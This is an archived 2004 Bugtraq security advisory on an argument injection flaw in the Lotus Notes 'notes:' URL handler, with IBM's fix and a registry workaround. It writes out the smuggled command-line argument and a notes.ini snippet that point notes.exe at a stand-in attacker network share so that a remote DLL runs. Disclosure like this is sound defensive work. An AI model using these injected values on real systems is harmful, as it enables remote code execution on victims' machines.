Lotus Notes URL argument injection vulnerability

From: Jouko Pynnonen (jouko_at_iki.fi)
Date: 06/27/04

  • Next message: Justin Wheeler: "Re: Microsoft and Security"
    Date: Sun, 27 Jun 2004 18:01:50 +0300
    To: bugtraq@securityfocus.com
    
    

    OVERVIEW
    ========

    Lotus Notes is a groupware/e-mail system developed by Lotus Software.
    Due to its security and collaboration features it's used particularly
    by large organizations, government agencies, etc. IBM estimates it is
    used by 60 million people.

    During the client-side Windows installation of Lotus Notes, a "notes:"
    URL handler is registered in the registry. An argument injection
    attack allows an intruder to pass command line arguments to notes.exe,
    which can lead to execution of arbitrary code.

    DETAILS
    =======

    The installed registry entry causes any "notes:" URL to be opened with
    notes.exe and the URL passed as the argument. If the URL contains space
    characters, notes.exe takes the characters after that as a second
    command line argument. Any web page can cause notes.exe be started in
    this way by refering to a notes: URL.

    Location of Notes configuration file, notes.ini, can be specified on
    the command line by prefixing it with an equals sign (=). The notes.ini
    file can be located on a network share. An attacker can use the URL to
    specify an arbitrary notes.ini file located on a public network share,
    so that the command run when opening the URL would be e.g.

      notes.exe =\\attacker.server\notes\notes.ini

    The notes.ini file contains locations for Notes data directory, which
    in this case can be also located on a public network share. The
    notes.ini file could contain e.g.

      [Notes]
      Directory=\\attacker.server\\notes

    The program uses this directory to load some dynamic libraries.
    The attacker can place arbitrary code in the init section of such DLL
    and cause it to be run during notes.exe startup. The scenario was
    successfully tested with an exploit. On opening the malicious web
    page, the victim system downloaded the DLL and ran the code in it.

    The exploit requires that notes.exe isn't already running while the
    victim views the malicious web page or e-mail message, because DLL's
    are only loaded on program startup. It also requires that outgoing
    connections to Internet shares aren't blocked by firewalls or registry
    settings.

    SOLUTION
    ========

    IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now
    been released to solve the issue. As a workaround, the registry key

       HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

    can be removed.

    CREDITS
    =======

    The vulnerability was discovered and researched by Jouko Pynnönen,
    Finland.

    -- 
    Jouko Pynnönen          Web: http://iki.fi/jouko/
    jouko@iki.fi            GSM: +358 41 5504555
    

  • Next message: Justin Wheeler: "Re: Microsoft and Security"

    Relevant Pages

    • [Full-Disclosure] Lotus Notes URL argument injection vulnerability
      ... Lotus Notes is a groupware/e-mail system developed by Lotus Software. ... URL handler is registered in the registry. ... attack allows an intruder to pass command line arguments to notes.exe, ... in this case can be also located on a public network share. ...
      (Full-Disclosure)
    • [NT] Lotus Notes URL Argument Injection Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... handler is registered in the registry. ... an intruder to pass command line arguments to notes.exe, ... this case can be also located on a public network share. ...
      (Securiteam)
    • Re: Starting a Systemwide App on boot?
      ... Why not use the registry? ... select the SYSTEM account when you define events in Task Scheduler. ... You'll have to use the 'at' command in a command shell. ...
      (microsoft.public.windowsxp.general)
    • Re: cleanup after malware/trojan/virus
      ... See if Start, Run, COMMAND works - it probably will. ... When you get into the registry, ... Highlight the Drivers32 folder on the left and observe the contents ... Specifically open the exported file with a text editor. ...
      (microsoft.public.windowsxp.help_and_support)
    • reply
      ... >tried deleting it from the msconfig Startup tool system, ... neither the listed name or command line name ... First, ME comes with a registry backup application, try ... folder temporarily by using attrib.exe: ...
      (microsoft.public.security.virus)